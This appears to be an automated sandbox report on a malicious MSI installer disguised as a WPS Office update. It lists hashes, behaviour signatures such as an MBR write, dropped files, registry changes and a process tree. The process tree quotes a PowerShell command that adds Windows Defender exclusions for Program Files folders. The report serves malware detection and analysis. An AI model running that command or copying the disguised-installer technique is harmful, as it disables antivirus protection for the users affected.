Analysis
-
max time kernel
118s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 04:56
Static task
static1
Behavioral task
behavioral1
Sample
wpsupdate.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
wpsupdate.msi
Resource
win10v2004-20241007-en
General
-
Target
wpsupdate.msi
-
Size
28.2MB
-
MD5
ef294458016f546c5eebd07d2dd98bad
-
SHA1
66bb14f670055272e12899d401b8668cad15fac9
-
SHA256
c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
-
SHA512
97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333
-
SSDEEP
786432:r3pUIX4j1lP1FYKJGIC6rO9HN47EbHxjprMfy6s0A:zpUIIj1l9FxJGIzcteEt2e0A
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2792 powershell.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 wpsupdate.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files\TransformOptimisticContributor\wpsupdate.exe msiexec.exe File opened for modification C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe MsiExec.exe File created C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe msiexec.exe File created C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe MsiExec.exe File created C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe msiexec.exe File created C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw msiexec.exe File opened for modification C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File opened for modification C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs WSEcydALszNI.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIBB25.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f76b931.msi msiexec.exe File opened for modification C:\Windows\Installer\f76b931.msi msiexec.exe File created C:\Windows\Installer\f76b932.ipi msiexec.exe File created C:\Windows\Installer\f76b934.msi msiexec.exe File opened for modification C:\Windows\Installer\f76b932.ipi msiexec.exe -
Executes dropped EXE 4 IoCs
pid Process 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe 1220 WSEcydALszNI.exe 2444 wpsupdate.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 2516 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpsupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSEcydALszNI.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1016 cmd.exe 1884 PING.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0 wpsupdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHDt = "19" wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo wpsupdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3_C = "a7a81a4a5babfce68580881b050e0402" wpsupdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD = "a7a81a4a5babfce68580881b050e0402" wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00460041002d00350039002d00460042002d00340046002d00410034002d00360037000000 wpsupdate.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common\InfoHD3t = "19" wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Kingsoft\Office\6.0\Common wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c047dd783f3adb01 powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\Software wpsupdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe -
Modifies registry class 22 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" msiexec.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1884 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 2940 msiexec.exe 2940 msiexec.exe 2792 powershell.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe 1220 WSEcydALszNI.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2516 msiexec.exe Token: SeIncreaseQuotaPrivilege 2516 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeSecurityPrivilege 2940 msiexec.exe Token: SeCreateTokenPrivilege 2516 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2516 msiexec.exe Token: SeLockMemoryPrivilege 2516 msiexec.exe Token: SeIncreaseQuotaPrivilege 2516 msiexec.exe Token: SeMachineAccountPrivilege 2516 msiexec.exe Token: SeTcbPrivilege 2516 msiexec.exe Token: SeSecurityPrivilege 2516 msiexec.exe Token: SeTakeOwnershipPrivilege 2516 msiexec.exe Token: SeLoadDriverPrivilege 2516 msiexec.exe Token: SeSystemProfilePrivilege 2516 msiexec.exe Token: SeSystemtimePrivilege 2516 msiexec.exe Token: SeProfSingleProcessPrivilege 2516 msiexec.exe Token: SeIncBasePriorityPrivilege 2516 msiexec.exe Token: SeCreatePagefilePrivilege 2516 msiexec.exe Token: SeCreatePermanentPrivilege 2516 msiexec.exe Token: SeBackupPrivilege 2516 msiexec.exe Token: SeRestorePrivilege 2516 msiexec.exe Token: SeShutdownPrivilege 2516 msiexec.exe Token: SeDebugPrivilege 2516 msiexec.exe Token: SeAuditPrivilege 2516 msiexec.exe Token: SeSystemEnvironmentPrivilege 2516 msiexec.exe Token: SeChangeNotifyPrivilege 2516 msiexec.exe Token: SeRemoteShutdownPrivilege 2516 msiexec.exe Token: SeUndockPrivilege 2516 msiexec.exe Token: SeSyncAgentPrivilege 2516 msiexec.exe Token: SeEnableDelegationPrivilege 2516 msiexec.exe Token: SeManageVolumePrivilege 2516 msiexec.exe Token: SeImpersonatePrivilege 2516 msiexec.exe Token: SeCreateGlobalPrivilege 2516 msiexec.exe Token: SeBackupPrivilege 2884 vssvc.exe Token: SeRestorePrivilege 2884 vssvc.exe Token: SeAuditPrivilege 2884 vssvc.exe Token: SeBackupPrivilege 2940 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2844 DrvInst.exe Token: SeLoadDriverPrivilege 2844 DrvInst.exe Token: SeLoadDriverPrivilege 2844 DrvInst.exe Token: SeLoadDriverPrivilege 2844 DrvInst.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeRestorePrivilege 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: 35 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: SeSecurityPrivilege 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: SeSecurityPrivilege 1668 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: SeRestorePrivilege 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: 35 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: SeSecurityPrivilege 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe Token: SeSecurityPrivilege 2672 QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2516 msiexec.exe 2516 msiexec.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe 2444 wpsupdate.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2940 wrote to memory of 560 2940 msiexec.exe 34 PID 2940 wrote to memory of 560 2940 msiexec.exe 34 PID 2940 wrote to memory of 560 2940 msiexec.exe 34 PID 2940 wrote to memory of 560 2940 msiexec.exe 34 PID 2940 wrote to memory of 560 2940 msiexec.exe 34 PID 560 wrote to memory of 2792 560 MsiExec.exe 36 PID 560 wrote to memory of 2792 560 MsiExec.exe 36 PID 560 wrote to memory of 2792 560 MsiExec.exe 36 PID 560 wrote to memory of 1016 560 MsiExec.exe 38 PID 560 wrote to memory of 1016 560 MsiExec.exe 38 PID 560 wrote to memory of 1016 560 MsiExec.exe 38 PID 1016 wrote to memory of 1668 1016 cmd.exe 40 PID 1016 wrote to memory of 1668 1016 cmd.exe 40 PID 1016 wrote to memory of 1668 1016 cmd.exe 40 PID 1016 wrote to memory of 1668 1016 cmd.exe 40 PID 1016 wrote to memory of 1884 1016 cmd.exe 41 PID 1016 wrote to memory of 1884 1016 cmd.exe 41 PID 1016 wrote to memory of 1884 1016 cmd.exe 41 PID 1016 wrote to memory of 2672 1016 cmd.exe 44 PID 1016 wrote to memory of 2672 1016 cmd.exe 44 PID 1016 wrote to memory of 2672 1016 cmd.exe 44 PID 1016 wrote to memory of 2672 1016 cmd.exe 44 PID 560 wrote to memory of 1220 560 MsiExec.exe 46 PID 560 wrote to memory of 1220 560 MsiExec.exe 46 PID 560 wrote to memory of 1220 560 MsiExec.exe 46 PID 560 wrote to memory of 1220 560 MsiExec.exe 46 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 PID 560 wrote to memory of 2444 560 MsiExec.exe 47 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2516
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding A73CA5812756B6C0B64396F1AD59FC9C M Global\MSI00002⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
